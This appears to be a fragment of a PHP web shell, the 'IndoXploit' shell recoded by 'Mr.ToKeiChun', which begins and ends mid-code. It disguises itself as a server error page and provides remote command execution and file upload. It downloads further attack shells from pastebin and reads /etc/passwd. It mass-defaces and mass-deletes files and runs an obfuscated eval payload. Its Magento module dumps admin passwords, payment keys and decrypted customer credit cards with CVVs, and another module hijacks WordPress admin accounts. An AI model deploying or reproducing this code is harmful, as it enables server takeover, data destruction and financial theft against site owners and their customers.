"; $tokeichun.="tokeichun@".$_SERVER['HTTP_HOST']." :~$ sudo su"; $tokeichun.="
"; $tokeichun.=""; if(empty($_GET['ulum'])=="heni"){ echo ' 500 Internal Server Error

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator at webmaster@'.$_SERVER['HTTP_HOST'].' to inform them of the time this error occurred, and the actions you performed just before this error.

More information about this error may be available in the server error log.

Additionally, a 500 Internal Server Error error was encountered while trying to use an ErrorDocument to handle the request.


'.$_SERVER['SERVER_SOFTWARE'].' Server at '.$_SERVER['HTTP_HOST'].' Port 80
'; }else{ echo $tokeichun; echo ""; } exit; } if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) if( empty( $auth_pass) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else login(); ?> ".$perm."
"; } else { return "".$perm.""; } } function UrlLoop($url,$type){ $urlArray = array(); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); $regex='|= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } if(get_magic_quotes_gpc()) { function idx_ss($array) { return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array); } $_POST = idx_ss($_POST); } function CreateTools($names,$lokasi){ if ( $_GET['create'] == $names ){ $a= "".$_SERVER['SERVER_NAME'].""; $b= dirname($_SERVER['PHP_SELF']); $c = "/tools/".$names.".php"; if (file_exists('tools/'.$names.'.php')){ echo ' '; } else {mkdir("tools", 0777); file_put_contents('tools/'.$names.'.php', file_get_contents($lokasi)); echo ' ';}}} CreateTools("wso","http://pastebin.com/raw/3eh3Gej2"); CreateTools("adminer","https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php"); CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV"); CreateTools("scanner","https://pastebin.com/raw/N6iBqjEA"); CreateTools("injection","http://pastebin.com/raw/nxxL8c1f"); CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq"); CreateTools("vhost","https://pastebin.com/raw/zDgukLLX"); CreateTools("grabber","https://pastebin.com/raw/HrHwKMyH"); CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV"); CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi"); CreateTools("tokopedia","http://pastebin.com/dvhzWgby"); CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ"); CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj"); CreateTools("r57","http://pastebin.com/raw/G2VEDunW"); CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL"); CreateTools("extractor","http://pastebin.com/raw/dBYyB7S5"); CreateTools("bh","http://pastebin.com/raw/A8TupKkC"); CreateTools("dhanus","http://pastebin.com/raw/W99Pvk3C"); if(isset($_GET['dir'])) { $dir = $_GET['dir']; chdir($_GET['dir']); } else { $dir = getcwd(); } $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF"; $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create"; $ds = @ini_get("disable_functions"); $mysql = (function_exists('mysql_connect')) ? "ON" : "OFF"; $curl = (function_exists('curl_version')) ? "ON" : "OFF"; $wget = (exe('wget --help')) ? "ON" : "OFF"; $perl = (exe('perl --help')) ? "ON" : "OFF"; $python = (exe('python --help')) ? "ON" : "OFF"; $show_ds = (!empty($ds)) ? "$ds" : "NONE"; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $d0mains = @file("/etc/named.conf"); $users=@file('/etc/passwd'); if($d0mains) { $count; foreach($d0mains as $d0main) { if(@ereg("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { flush(); $count++; } } } } $sport=$_SERVER['SERVER_PORT']; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo "\n"; } } elseif($_GET['do'] == 'symlink') { $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); $d0mains = @file("/etc/named.conf"); ##httaces if($d0mains){ @mkdir("scripts",0777); @chdir("scripts"); @exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks DirectoryIndex tokeichun.html AddType text/plain .php AddHandler text/plain .php Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo "
System: ".php_uname()."
User: ".$user." (".$uid.") Group: ".$group." (".$gid.")
Server IP: ".gethostbyname($_SERVER['HTTP_HOST'])." | Your IP: ".$_SERVER['REMOTE_ADDR']."
HDD: ".hdd(disk_free_space("/"))." / ".hdd(disk_total_space("/"))."
Websites : $count Domains
Port : $sport
Safe Mode: $sm
Disable Functions: $show_ds
MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
Current DIR: "; foreach($scdir as $c_dir => $cdir) { echo "$cdir/"; } echo " [ ".w($dir, perms($dir))." ]
"; echo "
~ $
"; if($_POST['do_cmd']) { echo "
".exe($_POST['cmd'])."
"; } if($_POST['upload']) { if($_POST['tipe_upload'] == 'biasa') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { $act = "Uploaded! at $dir/".$_FILES['ix_file']['name'].""; } else { $act = "failed to upload file"; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { $act = "Uploaded! at $root -> $web"; } else { $act = "failed to upload file"; } } else { $act = "failed to upload file"; } } } echo "
".w($dir,"Current")." ".w($_SERVER['DOCUMENT_ROOT'],"Home")."
"; echo $act; echo "
"; echo "
"; echo ""; echo "
"; echo "
"; if($_GET['do'] == 'upload') { echo "
"; if($_POST['upload']) { if($_POST['tipe_upload'] == 'biasa') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { $act = "Uploaded! at $dir/".$_FILES['ix_file']['name'].""; } else { $act = "failed to upload file"; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { $act = "Uploaded! at $root -> $web"; } else { $act = "failed to upload file"; } } else { $act = "failed to upload file"; } } } echo "Upload File:
Biasa [ ".w($dir,"Writeable")." ] home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]
"; echo $act; echo "
"; } elseif($_GET['do'] == 'mass_delete') { function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($lokasi)) { echo "[DELETED] $lokasi
"; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } if($_POST['start']) { echo "
"; hapus_massal($_POST['d_dir'], $_POST['d_file']); echo "
"; } else { echo "
"; echo "
Folder:

Filename:

"; } } elseif($_GET['do'] == 'mass_deface') { echo "
\n"; $dirr=$_POST['d_dir']; $index = $_POST["script"]; $index = str_replace('"',"'",$index); $index = stripslashes($index); function edit_file($file,$index){ if (is_writable($file)) { clear_fill($file,$index); echo " [+] Nyabun 100% Successfull
"; } else { echo " [-] Ternyata Tidak Boleh Menyabun Disini :(
"; } } function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($lokasi)) { echo "[DELETED] $lokasi
"; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } function clear_fill($file,$index){ if(file_exists($file)){ $handle = fopen($file,'w'); fwrite($handle,''); fwrite($handle,$index); fclose($handle); } } function gass(){ global $dirr , $index ; chdir($dirr); $me = str_replace(dirname(__FILE__).'/','',__FILE__); $files = scandir($dirr) ; $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..","."); sort($files); $n = 0 ; foreach ($files as $file){ if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) { echo "
$dirr/$file ====> "; edit_file($file,$index); flush(); $n = $n +1 ; } } echo "
"; echo "

$n Kali Anda Telah Ngecrot Disini


"; } function ListFiles($dirrall) { if($dh = opendir($dirrall)) { $files = Array(); $inner_files = Array(); $me = str_replace(dirname(__FILE__).'/','',__FILE__); $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db"); while($file = readdir($dh)) { if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) { if(is_dir($dirrall . "/" . $file)) { $inner_files = ListFiles($dirrall . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dirrall . "/" . $file); } } } closedir($dh); return $files; } } function gass_all(){ global $index ; $dirrall=$_POST['d_dir']; foreach (ListFiles($dirrall) as $key=>$file){ $file = str_replace('//',"/",$file); echo "
$file ===>"; edit_file($file,$index); flush(); } $key = $key+1; echo "

$key Kali Anda Telah Ngecrot Disini


"; } function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } if($_POST['mass'] == 'onedir') { echo "
Versi Text Area



Versi Text


\n"; $mainpath=$_POST[d_dir];$file=$_POST[d_file]; $dir=opendir("$mainpath"); $code=base64_encode($_POST[script]); $indx=base64_decode($code); while($row=readdir($dir)){$start=@fopen("$row/$file","w+"); $finish=@fwrite($start,$indx); if ($finish){echo 'http://' . $row . '/' . $file . '
'; } } } elseif($_POST['mass'] == 'sabunkabeh') { gass(); } elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); } elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); } elseif($_POST['mass'] == 'massdeface') { echo "
"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } else { echo "
Select Type:

Folder:

Filename:

Index File:

"; } } elseif($_GET['do'] == 'magen') { echo'

[M A G E N T O] - Stealing Information
coder: sohai & n4KuLa_
'; if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){ $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml'); if(isset($xml->global->resources->default_setup->connection)) { $connection = $xml->global->resources->default_setup->connection; $prefix = $xml->global->resources->db->table_prefix; $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1 require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php'; try { $app = Mage::app('default'); Mage::getSingleton('core/session', array('name'=>'frontend')); }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."
\n";} if (!mysql_connect($connection->host, $connection->username, $connection->password)){ print("Could not connect: " . mysql_error()); } mysql_select_db($connection->dbname); echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key
\n"; $crypto = new Varien_Crypt_Mcrypt(); $crypto->init($key); //========================================================================================================= $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'"); if (!$query){ echo "
Gagal
"; }else{ $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'")); echo'

====================================================================
[ Admin FROM website : '.$site['website'].']
====================================================================
'; } echo " "; while($vx = mysql_fetch_array($query)) { $no = 1; $user_id = $vx['user_id']; $username = $vx['username']; $password = $vx['password']; $email = $vx['email']; $firstname = $vx['firstname']; $lastname = $vx['lastname']; echo "
";  
        }   
    echo "
id firstname lastname email username password
$user_id$firstname$lastname$email$username$password

"; //========================================================================================================= $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'"); if(mysql_num_rows($query) != 0){ if (!$query){ echo "
Gagal
"; }else{ echo'

====================================================================
[ Authorizenet ]
====================================================================
'; } echo " "; $no = 1; while($vx = mysql_fetch_array($query)) { $user = $crypto->decrypt($vx['user']); $pass = $crypto->decrypt($vx['pass']); echo "
";  
            $no++;  
            }   
        echo "
no user pass
$no$user$pass

"; } //========================================================================================================= $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1"); if(mysql_num_rows($query_smtp) != 0){ if (!$query_smtp){ echo "
Gagal
"; }else{ echo'

====================================================================
[ SMTP ]
====================================================================
'; } echo " "; $no = 1; $batas = 0; while($rows = mysql_fetch_array($query_smtp)) { $smtphost = $rows[0]; $smtpport = $rows[1]; $smtpuser = $rows[2]; $smtppass = $rows[3]; echo "
";  
                $no++;  
            }  
        echo "
no host port user pass
$no$smtphost$smtpport$smtpuser$smtppass

"; } //========================================================================================================= $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'"); $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''"); if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){ echo'

====================================================================
[ Credit Card ]
====================================================================
'; echo " "; $no = 1; $batas = 0; while($vx = mysql_fetch_array($query)){ $date = $vx['updated_at']; $cc_owner = $vx['cc_owner']; $method = $vx['method']; $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']); $exp = $vx['exp']; $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']); $Billing_Address = $vx['Billing Address']; echo "
";  
                $batas = $no++;  
                }  
                  
                while($vx2 = mysql_fetch_array($query2)){  
                    $batas +=1;  
                $cc_owner = $vx2['cc_owner'];  
                $method = $vx2['method'];  
                $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);  
                $exp = $vx2['exp'];          
                $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);  
                $Billing_Address = $vx2['Billing Address'];  
                echo "
";  
                 $batas++;  
                }       
                  
            echo "
no Date Credit Owner method Credit Number Credit Exp CVV Address
$no$date$cc_owner$method$cc_number_enc$exp$cc_cid_enc$Billing_Address
$batas$cc_owner$method$cc_number_enc$exp$cc_cid_status$Billing_Address

"; } //========================================================================================================= $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12"); $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote"); if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){ if (!$query){ echo "
Gagal
"; }else{ echo'

====================================================================
[ Customer ]
====================================================================
'; } echo " "; $no = 1; $batas = 0; while($vx = mysql_fetch_array($query)) { $user = $vx['email']; $pass = $vx['value']; echo "
";  
                $batas = $no++;  
            }   
              
            if(mysql_num_rows($query2) != 0 && ($query2)){  
                while($vx2 = mysql_fetch_array($query2)){  
                    $user = $vx2['customer_email'];  
                    $pass = $crypto->decrypt($vx2['password_hash']);  
                    if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin   
                        $batas +=1;  
                        echo "
";  
                        $batas++;  
                    }  
                }                  
            }  
          
        echo "
no user pass
$no$user$pass
$batas$user$pass

"; } //========================================================================================================= } } function save($format,$data){ $fp = fopen($format, 'a'); fwrite($fp, $data); fclose($fp); } function cekbase64($string){ $decoded = base64_decode($string, true); if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false; if(!base64_decode($string, true)) return false; if(base64_encode($decoded) != $string) return false; return true;//nilai return 1 jika true } //----untuk decode password ---/ class Varien_Crypt_Mcrypt{ /** * Constuctor * * @param array $data */ public function __construct() { } /** * Initialize mcrypt module * * @param string $key cipher private key * @return Varien_Crypt_Mcrypt */ public function init($key) { $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, ''); $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND); $maxKeySize = mcrypt_enc_get_key_size($this->handler); if (iconv_strlen($key, 'UTF-8')>$maxKeySize) { //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize); return null; } mcrypt_generic_init($this->handler, $key, $iv); return $this; } /** * Encrypt data * * @param string $data source string * @return string */ public function encrypt($data) { if (!$this->handler) { //throw new Varien_Exception('Crypt module is not initialized.'); return null; } if (strlen($data) == 0) { return $data; } return base64_encode(mcrypt_generic($this->handler, $data)); } /** * Decrypt data * * @param string $data encrypted string * @return string */ public function decrypt($data) { if (!$this->handler) { //throw new Varien_Exception('Crypt module is not initialized.'); return null; } if (strlen($data) == 0) { return $data; } return mdecrypt_generic($this->handler, base64_decode($data)); } /** * Desctruct cipher module * */ public function __destruct() { if ($this->handler) { $this->_reset(); } } protected function _reset() { mcrypt_generic_deinit($this->handler); mcrypt_module_close($this->handler); } } } elseif($_GET['do'] == 'zip') { echo "

Zip Menu

"; function rmdir_recursive($dir) { foreach(scandir($dir) as $file) { if ('.' === $file || '..' === $file) continue; if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file"); else unlink("$dir/$file"); } rmdir($dir); } if($_FILES["zip_file"]["name"]) { $filename = $_FILES["zip_file"]["name"]; $source = $_FILES["zip_file"]["tmp_name"]; $type = $_FILES["zip_file"]["type"]; $name = explode(".", $filename); $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed'); foreach($accepted_types as $mime_type) { if($mime_type == $type) { $okay = true; break; } } $continue = strtolower($name[1]) == 'zip' ? true : false; if(!$continue) { $message = "Itu Bukan Zip , , GOBLOK COK"; } $path = dirname(__FILE__).'/'; $filenoext = basename ($filename, '.zip'); $filenoext = basename ($filenoext, '.ZIP'); $targetdir = $path . $filenoext; $targetzip = $path . $filename; if (is_dir($targetdir)) rmdir_recursive ( $targetdir); mkdir($targetdir, 0777); if(move_uploaded_file($source, $targetzip)) { $zip = new ZipArchive(); $x = $zip->open($targetzip); if ($x === true) { $zip->extractTo($targetdir); $zip->close(); unlink($targetzip); } $message = "Sukses Gan :)"; } else { $message = "Error Gan :("; } } echo '

Upload And Unzip

'; if($message) echo "

$message

"; echo "

Zip Backup

Folder:

Save To:

"; if($_POST['backup']){ $save=$_POST['save']; function Zip($source, $destination) { if (extension_loaded('zip') === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } else if (is_file($file) === true) { $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file)); } } } else if (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } return $zip->close(); } } return false; } Zip($_POST['dir'],$save); echo "Done , Save To $save"; } echo "

Unzip Manual

Zip Location:

Save To:

"; if($_POST['extrak']){ $save=$_POST['save']; $zip = new ZipArchive; $res = $zip->open($_POST['dir']); if ($res === TRUE) { $zip->extractTo($save); $zip->close(); echo 'Succes , Location : '.$save.''; } else { echo 'Gagal Mas :( Ntahlah !'; } } echo '
'; } elseif($_GET['do'] == 'shellchk') { eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUdaQttAED03Rf7DsE+KkdKED2QoxBYFJaiXV6Soh1Mo2t3uroF1cI9wt+uK/95Mx2kdKIceqJXIXvu9mTezYgf6PVllAXmSIDeoon5ikglIArclhixGciK4sXbKwCamEDxxDFc0uVVQJoU2zDMMPhqr0IJnNsFcuBRIyGVw5NlrnKgjOU07sdFFmEQiyrHO0bmRzCWr08TKMVWE0+HR0Sko8UAPh9Fx3MSNJni1/RdcxgYSdLUOmY7XeMMZmJXEd0gWpgk5q0r31sW0vCUCXAnnGIX1BVPsvN/Lb14VBRs0WC9qqZBHZY3LUaQY7JscVtsB/Or3gK79HC2VpiHcMrarFmleo7SxJvYgkqSNChra4vBhCB+GY9IiJYGkSJSP+C/i5NRfAuCjZ17N4HkwJMpv4N8P7mlgvnWCSc+Upv5HcRC0d084Pjx5WKmY94UujEOeuJzNp5/m0wWbzr9dXs+Xn2JhpjPWBKrQP+I0aYRy1f6dTi0XSxe0FunqJaYL8aL2sJRz1Ra8o8pfF6UtXMDs98JkbbLHJxcb/8rbhw14KcN6toNB7KeOkgdIGIynXmSjZwSs39uRm+X0ORMSbMBlqymDbDSUgUzWjZtIwQKCD/8EHgJ6riNz++agy6nPFW4E31FnqrjxHhcqvEiIPPoib55tM2VQnqxu8B4mFmWFmT91o65l8rlIcbtjuWmW/4yefZ6Mq3AC46gp8AnQdnzmgdN0HmtdJXJW6iw1nbJrPnz1k4JbBzNH96hgrhSZde/teNkx7z/vr7altPn/2GCFdvREGGv7Le736Oe3uNAaWrC/vLqcXS8G2+lUM6IzunUy6M408Z2iTXgCcnUnV1qoJqd0S6XsKnUqp+GJNsnJR9uISWJw77iqMl01vvZ1FrCX5/uVgcsqEvvLka5iaM+rJjSdn6FQeou2wb45BH/3Gw==')))))); } elseif($_GET['do'] == 'loghunter') { echo '

Log Hunter

'; echo "
\n"; echo "
\n"; ?>
Dir :\n"; echo "
\n"; echo "
\n";
error_reporting(0);
/*
Name    : Log Hunter (Grab Email)
Date    : 26/03/2016 05:53 PM
Link    : http://facebook.com/bug7sec
Link    : http://pastebin.com/u/shor7cut
Author  : Shor7cut
*/
 
 
if($_POST['submit']){
function tampilkan($shcdirs){
foreach(scandir($shcdirs) as $shc)
    {
        if($shc!='.' && $shc!='..')
        {
            $shc = $shcdirs.DIRECTORY_SEPARATOR.$shc;
            if( !is_dir($shc) && !eregi("css", $shc) ){
 
                $fgt    = file_get_contents($shc);
                $ifgt   = exif_read_data($shc);
                $jembut = "COMPUTED";
                $taik   = "UserComment";
                $shcm = "/mail['(']/";
                if($ifgt[$jembut][$taik]){
                    echo "[Stegano] ".$shc."
"; } preg_match_all('#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#',$fgt,$cocok); $hcs = "/base64_decode/"; $exif = "/exif_read_data/"; preg_match($shcm, addslashes($fgt), $mailshc); preg_match($hcs, addslashes($fgt), $shcmar); preg_match($exif, addslashes($fgt), $shcxif); if(eregi('HTTP Cookie File', $fgt) || eregi('PHP Warning:', $fgt) ){ } if(eregi('tmp_name', $fgt)){ echo "[Uploader] ".$shc."
"; } if($shcmar[0]){ echo "[Base64] ".$shc."
"; } if($mailshc[0]){ echo "[MailFunc] ".$shc."
"; } if($shcxif[0]){ echo "[Stegano] ".$shc." {Manual Check}
"; } if(eregi("js", $shc)){ echo "[Javascript] ".$shc." { CheckJS }
"; } if($cocok[0]){ foreach ($cocok[0] as $key => $shcmail) { if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) { echo "[SendMail] ".$shc." { ".$shcmail." }
"; } } } }else{ tampilkan($shc); } } } } tampilkan($_POST['shc_dir']); } echo "
\n"; echo "
\n";} elseif($_GET['do'] == 'metu') { echo '
'; unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo 'Byee !'; } elseif($_GET['do'] == 'about') { echo '
Mr.ToKeiChun69 Shell
IndoXploit Shell Recoded By Mr.ToKeiChun59
Here'; } elseif($_GET['do'] == 'symlink404') { echo "

File Target:
Save As:

"; @error_reporting(0); @ini_set('display_errors', 0); if($_POST['sym404']){ rmdir("sym404");mkdir("sym404", 0777); $dir = $_POST['dir']; $jnck = $_POST['jnck']; system("ln -s ".$dir." sym404/".$jnck); symlink($dir,"sym404/".$jnck); $inija = fopen("sym404/.htaccess", "w"); fwrite($inija,"Options Indexes FollowSymLinks DirectoryIndex tokeichun.html AddType text/plain .php AddHandler text/plain .php Satisfy Any ReadmeName ".$jnck); echo'Succes! >:('; } } elseif($_GET['do'] == 'auto_cu_wp') { if($_POST['gass']) { echo "

WordPress Auto Change User 2

Link Config:

"; } else { echo "

WordPress Auto Change User 2

Link Config:

"; } if($_POST['auto_cu_wp']) { function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION,true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); $user = "amiqul1337"; $pass = "amiqul1337"; $passx = md5($pass); foreach($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { echo "[-] error, gabisa ambil nama domain nya
"; } else { echo "[ $target ]
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); if(!$conn OR !$db OR !$update) { echo "[-] MySQL Error: ".mysql_error()."

"; mysql_close($conn); } else { echo "[+] $target/wp-login.php
"; echo "[+] username: $user
"; echo "[+] password: $pass

"; mysql_close($conn); } } } } elseif($_GET['do'] == 'auto_cu_joomla') { if($_POST['gass']) { echo "

Joomla Auto Change User 2

Link Config:

"; } else { echo "

Joomla Auto Change User 2

Link Config:

